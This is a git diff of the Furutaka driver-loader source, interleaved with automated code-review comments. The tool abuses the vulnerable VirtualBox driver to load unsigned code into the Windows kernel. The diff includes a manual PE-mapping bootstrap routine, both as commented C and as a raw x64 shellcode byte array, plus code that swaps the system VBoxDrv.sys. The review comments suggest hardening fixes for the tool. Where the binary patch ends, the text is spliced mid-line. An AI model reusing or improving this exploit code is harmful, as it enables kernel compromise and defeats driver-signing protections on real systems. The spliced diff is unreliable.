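Review bot: The three assignments added before `RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\...\\VBoxDrv.sys")` are dead stores: RtlInitUnicodeString itself sets Buffer, Length and MaximumLength from the literal, so `uStr.Buffer = NULL; uStr.Length = 0; uStr.MaximumLength = 0;` can simply be dropped, or, if the intent is defensive zeroing, replaced by the `RtlSecureZeroMemory(&uStr, sizeof(uStr));` form that TDLMapDriver already uses for the same struct. Separately, `CloseHandle(g_hVBox)` near the top of the function leaves the global pointing at a closed handle; TDLExploit resets it with `g_hVBox = INVALID_HANDLE_VALUE;` right after closing, and this function should do the same so that any later `g_hVBox != INVALID_HANDLE_VALUE` check cannot act on a stale value.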
@@ -715,37 +717,37 @@ void TDLStopVulnerableDriver( * */ UINT TDLProcessCommandLine( - LPWSTR lpCommandLine - ) + LPWSTR lpCommandLine +) { - UINT retVal = (UINT)-1; - WCHAR szInputFile[MAX_PATH + 1]; - ULONG c; - - //input file - c = 0; - RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); - GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); - if (c == 0) { - cuiPrintText(g_ConOut, - T_LOADERUSAGE, - g_ConsoleOutput, FALSE); - return retVal; - } + UINT retVal = (UINT)-1; + WCHAR szInputFile[MAX_PATH + 1]; + ULONG c; - if (PathFileExists(szInputFile)) { - g_hVBox = TDLStartVulnerableDriver(); - if (g_hVBox != INVALID_HANDLE_VALUE) { - retVal = TDLMapDriver(szInputFile); - TDLStopVulnerableDriver(); - } - } - else { - cuiPrintText(g_ConOut, - TEXT("Ldr: Input file not found"), - g_ConsoleOutput, FALSE); - } - return retVal; + //input file + c = 0; + RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); + GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); + if (c == 0) { + cuiPrintText(g_ConOut, + T_LOADERUSAGE, + g_ConsoleOutput, FALSE); + return retVal; + } + + if (PathFileExists(szInputFile)) { + g_hVBox = TDLStartVulnerableDriver(); + if (g_hVBox != INVALID_HANDLE_VALUE) { + retVal = TDLMapDriver(szInputFile); + TDLStopVulnerableDriver(); + } + } + else { + cuiPrintText(g_ConOut, + TEXT("Ldr: Input file not found"), + g_ConsoleOutput, FALSE); + } + return retVal; } /* 
@@ -759,80 +761,81 @@ UINT TDLProcessCommandLine( void TDLMain() { - BOOL cond = FALSE; - UINT uResult = 0; - DWORD dwTemp; - LONG x; - OSVERSIONINFOW osv; - WCHAR text[256]; + BOOL cond = FALSE; + UINT uResult = 0; + DWORD dwTemp; + LONG x; + OSVERSIONINFOW osv; + WCHAR text[256]; - __security_init_cookie(); + __security_init_cookie(); - do { - g_hInstance = GetModuleHandle(NULL); + do { - g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); - if (g_ConOut == INVALID_HANDLE_VALUE) { - uResult = (UINT)-1; - break; - } + g_hInstance = GetModuleHandle(NULL); - g_ConsoleOutput = TRUE; - if (!GetConsoleMode(g_ConOut, &dwTemp)) { - g_ConsoleOutput = FALSE; - } + g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); + if (g_ConOut == INVALID_HANDLE_VALUE) { + uResult = (UINT)-1; + break; + } - SetConsoleTitle(T_LOADERTITLE); - SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); - if (g_ConsoleOutput == FALSE) { - WriteFile(g_ConOut, &BE, sizeof(WCHAR), &dwTemp, NULL); - } + g_ConsoleOutput = TRUE; + if (!GetConsoleMode(g_ConOut, &dwTemp)) { + g_ConsoleOutput = FALSE; + } - cuiPrintText(g_ConOut, - T_LOADERINTRO, - g_ConsoleOutput, TRUE); + SetConsoleTitle(T_LOADERTITLE); + SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); + if (g_ConsoleOutput == FALSE) { + WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL); + } + + cuiPrintText(g_ConOut, + T_LOADERINTRO, + g_ConsoleOutput, TRUE); - x = InterlockedIncrement((PLONG)&g_lApplicationInstances); - if (x > 1) { - cuiPrintText(g_ConOut, - T_LOADERRUN, - g_ConsoleOutput, FALSE); - uResult = (UINT)-1; - break; - } + x = InterlockedIncrement((PLONG)&g_lApplicationInstances); + if (x > 1) { + cuiPrintText(g_ConOut, + T_LOADERRUN, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } - //check version first - RtlSecureZeroMemory(&osv, sizeof(osv)); - osv.dwOSVersionInfoSize = sizeof(osv); - RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); - if (osv.dwMajorVersion < 
6) { - cuiPrintText(g_ConOut, - T_LOADERUNSUP, - g_ConsoleOutput, FALSE); - uResult = (UINT)-1; - break; - } + //check version first + RtlSecureZeroMemory(&osv, sizeof(osv)); + osv.dwOSVersionInfoSize = sizeof(osv); + RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); + if (osv.dwMajorVersion < 6) { + cuiPrintText(g_ConOut, + T_LOADERUNSUP, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } - _strcpy(text, TEXT("Ldr: Windows v")); - ultostr(osv.dwMajorVersion, _strend(text)); - _strcat(text, TEXT(".")); - ultostr(osv.dwMinorVersion, _strend(text)); - _strcat(text, TEXT(" build ")); - ultostr(osv.dwBuildNumber, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + _strcpy(text, TEXT("Ldr: Windows v")); + ultostr(osv.dwMajorVersion, _strend(text)); + _strcat(text, TEXT(".")); + ultostr(osv.dwMinorVersion, _strend(text)); + _strcat(text, TEXT(" build ")); + ultostr(osv.dwBuildNumber, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - g_VBoxInstalled = TDLVBoxInstalled(); - if (g_VBoxInstalled) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Warning VirtualBox software installed, conficts possible"), - g_ConsoleOutput, TRUE); - } + g_VBoxInstalled = TDLVBoxInstalled(); + if (g_VBoxInstalled) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Warning, VirtualBox software installed, conflicts are possible"), + g_ConsoleOutput, TRUE); + } - uResult = TDLProcessCommandLine(GetCommandLine()); + uResult = TDLProcessCommandLine(GetCommandLine()); - } while (cond); + } while (cond); - InterlockedDecrement((PLONG)&g_lApplicationInstances); - ExitProcess(uResult); + InterlockedDecrement((PLONG)&g_lApplicationInstances); + ExitProcess(uResult); } 
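Review bot: The single-instance guard in TDLMain, `x = InterlockedIncrement((PLONG)&g_lApplicationInstances); if (x > 1)`, only counts entries within the current process, so if `g_lApplicationInstances` is an ordinary global (its definition is outside this hunk) a second Furutaka.exe started at the same time passes the check and both instances go on to install, use and then delete the same VBoxDrv service and driver file. A cross-process guard needs a kernel object: create a named mutex with `CreateMutex` before the intro banner and treat `GetLastError() == ERROR_ALREADY_EXISTS` exactly like the existing `x > 1` branch (print `T_LOADERRUN`, set `uResult = (UINT)-1`, break). If the interlocked counter is kept only as a reentrancy check, say so next to it: `// in-process reentrancy guard only; does not detect a second loader process`.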
diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc index b664ad48057455329fd15ddf7ac662ce8eb3e77a..351f442c7176a2a4729c40bed9b8f6bc4cff6863 100644 GIT binary patch delta 310 zcmeyQc1&kO2>WC=fgh8(n3w3fGUPF&GvqL2G88jpFeor+FoXg{G8sx3QW;W!{9qs} z5zH%Q(43qoBs}>6a{;R>gC9fa)a{>QrvsBoiz%3>Ki%LTn delta 110 zcmX@6^GR((2>awYf*U4p;ws}bV9;RzVZ+Jh+?oj9=6vqijEn}Gxq00gfuedqHF`ib niF^+k%{DvpN23agPrfD~1jJK-Ie_lfanew); + PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; + PIMAGE_FILE_HEADER fileh = + (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); - PIMAGE_OPTIONAL_HEADER popth = - (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); - ULONG isz = popth->SizeOfImage; - HANDLE th; + ULONG isz = popth->SizeOfImage; + HANDLE th; - PIMAGE_BASE_RELOCATION rel; - DWORD_PTR delta; - LPWORD chains; - DWORD c, p, rsz; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; - OBJECT_ATTRIBUTES attr; + OBJECT_ATTRIBUTES attr; - exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( - NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; - exbuffer &= ~(PAGE_SIZE - 1); + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); - if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) - if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) - { - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + - popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; - delta = 
(DWORD_PTR)exbuffer - popth->ImageBase; - c = 0; + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; - while (c < rsz) { - p = sizeof(IMAGE_BASE_RELOCATION); - chains = (LPWORD)((PBYTE)rel + p); + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); - while (p < rel->SizeOfBlock) { + while (p < rel->SizeOfBlock) { - switch (*chains >> 12) { - case IMAGE_REL_BASED_HIGHLOW: - *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; - break; - case IMAGE_REL_BASED_DIR64: - *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; - break; - } + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } - chains++; - p += sizeof(WORD); - } + chains++; + p += sizeof(WORD); + } - c += rel->SizeOfBlock; - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); - } - } + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } - isz >>= 3; - for (pos = 0; pos < isz; pos++) - ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; - InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); - PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, - (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); + InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); + PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); } */ static const unsigned char TDLBootstrapLoader_code[415] = { - 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 
0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, - 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, - 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, - 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, - 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, - 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, - 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, - 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, - 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, - 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, - 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, - 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, - 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, - 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, - 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, - 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, - 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, - 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, - 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, - 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, - 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 
0xF3, 0x0F, 0x7F, 0x44, - 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, - 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, - 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, - 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, - 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 + 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, + 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, + 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, + 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, + 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, + 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, + 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, + 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, + 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 
0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, + 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, + 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, + 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, + 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, + 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, + 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, + 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 }; diff --git a/Source/Furutaka/sup.c b/Source/Furutaka/sup.c index b1d4b91..c23db86 100644 --- a/Source/Furutaka/sup.c +++ b/Source/Furutaka/sup.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SUP.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 
@@ -25,43 +25,43 @@
 *
 */
 PVOID supGetSystemInfo(
- _In_ SYSTEM_INFORMATION_CLASS InfoClass
- )
+ _In_ SYSTEM_INFORMATION_CLASS InfoClass
+)
 {
- INT c = 0;
- PVOID Buffer = NULL;
- ULONG Size = 0x1000;
- NTSTATUS status;
- ULONG memIO;
- PVOID hHeap = NtCurrentPeb()->ProcessHeap;
+ INT c = 0;
+ PVOID Buffer = NULL;
+ ULONG Size = 0x1000;
+ NTSTATUS status;
+ ULONG memIO;
+ PVOID hHeap = NtCurrentPeb()->ProcessHeap;
 
- do {
- Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
- if (Buffer != NULL) {
- status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
- }
- else {
- return NULL;
- }
- if (status == STATUS_INFO_LENGTH_MISMATCH) {
- RtlFreeHeap(hHeap, 0, Buffer);
- Size *= 2;
- c++;
- if (c > 100) {
- status = STATUS_SECRET_TOO_LONG;
- break;
- }
- }
- } while (status == STATUS_INFO_LENGTH_MISMATCH);
+ do {
+ Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size);
+ if (Buffer != NULL) {
+ status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO);
+ }
+ else {
+ return NULL;
+ }
+ if (status == STATUS_INFO_LENGTH_MISMATCH) {
+ RtlFreeHeap(hHeap, 0, Buffer);
+ Size *= 2;
+ c++;
+ if (c > 100) {
+ status = STATUS_SECRET_TOO_LONG;
+ break;
+ }
+ }
+ } while (status == STATUS_INFO_LENGTH_MISMATCH);
 
- if (NT_SUCCESS(status)) {
- return Buffer;
- }
+ if (NT_SUCCESS(status)) {
+ return Buffer;
+ }
 
- if (Buffer) {
- RtlFreeHeap(hHeap, 0, Buffer);
- }
- return NULL;
+ if (Buffer) {
+ RtlFreeHeap(hHeap, 0, Buffer);
+ }
+ return NULL;
 }
 
 /*
@@ -73,19 +73,19 @@ PVOID supGetSystemInfo( * */ ULONG_PTR supGetNtOsBase( - VOID - ) + VOID +) { - PRTL_PROCESS_MODULES miSpace; - ULONG_PTR NtOsBase = 0; + PRTL_PROCESS_MODULES miSpace; + ULONG_PTR NtOsBase = 0; - miSpace = supGetSystemInfo(SystemModuleInformation); - while (miSpace != NULL) { - NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); - break; - } - return NtOsBase; + miSpace = supGetSystemInfo(SystemModuleInformation); + while (miSpace != NULL) { + NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); + break; + } + return NtOsBase; } /* @@ -97,34 +97,34 @@ ULONG_PTR supGetNtOsBase( * */ PBYTE supQueryResourceData( - _In_ ULONG_PTR ResourceId, - _In_ PVOID DllHandle, - _In_ PULONG DataSize - ) + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize +) { - NTSTATUS status; - ULONG_PTR IdPath[3]; - IMAGE_RESOURCE_DATA_ENTRY *DataEntry; - PBYTE Data = NULL; - ULONG SizeOfData = 0; + NTSTATUS status; + ULONG_PTR IdPath[3]; + IMAGE_RESOURCE_DATA_ENTRY *DataEntry; + PBYTE Data = NULL; + ULONG SizeOfData = 0; - if (DllHandle != NULL) { + if (DllHandle != NULL) { - IdPath[0] = (ULONG_PTR)RT_RCDATA; //type - IdPath[1] = ResourceId; //id - IdPath[2] = 0; //lang + IdPath[0] = (ULONG_PTR)RT_RCDATA; //type + IdPath[1] = ResourceId; //id + IdPath[2] = 0; //lang - status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); - if (NT_SUCCESS(status)) { - status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); - if (NT_SUCCESS(status)) { - if (DataSize) { - *DataSize = SizeOfData; - } - } - } - } - return Data; + status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); + if (NT_SUCCESS(status)) { + status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); + if (NT_SUCCESS(status)) { + if (DataSize) { + *DataSize = SizeOfData; + } + } + } + } + return Data; } /* 
@@ -136,39 +136,39 @@ PBYTE supQueryResourceData( * */ BOOL supBackupVBoxDrv( - _In_ BOOL bRestore - ) + _In_ BOOL bRestore +) { - BOOL bResult = FALSE; - WCHAR szOldDriverName[MAX_PATH * 2]; - WCHAR szNewDriverName[MAX_PATH * 2]; - WCHAR szDriverDirName[MAX_PATH * 2]; + BOOL bResult = FALSE; + WCHAR szOldDriverName[MAX_PATH * 2]; + WCHAR szNewDriverName[MAX_PATH * 2]; + WCHAR szDriverDirName[MAX_PATH * 2]; - if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { - return FALSE; - } + if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { + return FALSE; + } - _strcat(szDriverDirName, TEXT("\\drivers\\")); + _strcat(szDriverDirName, TEXT("\\drivers\\")); - if (bRestore) { - _strcpy(szOldDriverName, szDriverDirName); - _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); - if (PathFileExists(szOldDriverName)) { - _strcpy(szNewDriverName, szDriverDirName); - _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); - bResult = MoveFileEx(szOldDriverName, szNewDriverName, - MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); - } - } - else { - _strcpy(szOldDriverName, szDriverDirName); - _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); - _strcpy(szNewDriverName, szDriverDirName); - _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); - bResult = MoveFileEx(szOldDriverName, szNewDriverName, - MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); - } - return bResult; + if (bRestore) { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); + if (PathFileExists(szOldDriverName)) { + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + } + else { + _strcpy(szOldDriverName, szDriverDirName); + _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); + _strcpy(szNewDriverName, szDriverDirName); + _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); + bResult = MoveFileEx(szOldDriverName, szNewDriverName, + 
MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); + } + return bResult; } /* 
@@ -180,93 +180,93 @@ BOOL supBackupVBoxDrv( * */ SIZE_T supWriteBufferToFile( - _In_ PWSTR lpFileName, - _In_ PVOID Buffer, - _In_ SIZE_T Size, - _In_ BOOL Flush, - _In_ BOOL Append - ) + _In_ PWSTR lpFileName, + _In_ PVOID Buffer, + _In_ SIZE_T Size, + _In_ BOOL Flush, + _In_ BOOL Append +) { - NTSTATUS Status; - DWORD dwFlag; - HANDLE hFile = NULL; - OBJECT_ATTRIBUTES attr; - UNICODE_STRING NtFileName; - IO_STATUS_BLOCK IoStatus; - LARGE_INTEGER Position; - ACCESS_MASK DesiredAccess; - PLARGE_INTEGER pPosition = NULL; - ULONG_PTR nBlocks, BlockIndex; - ULONG BlockSize, RemainingSize; - PBYTE ptr = (PBYTE)Buffer; - SIZE_T BytesWritten = 0; + NTSTATUS Status; + DWORD dwFlag; + HANDLE hFile = NULL; + OBJECT_ATTRIBUTES attr; + UNICODE_STRING NtFileName; + IO_STATUS_BLOCK IoStatus; + LARGE_INTEGER Position; + 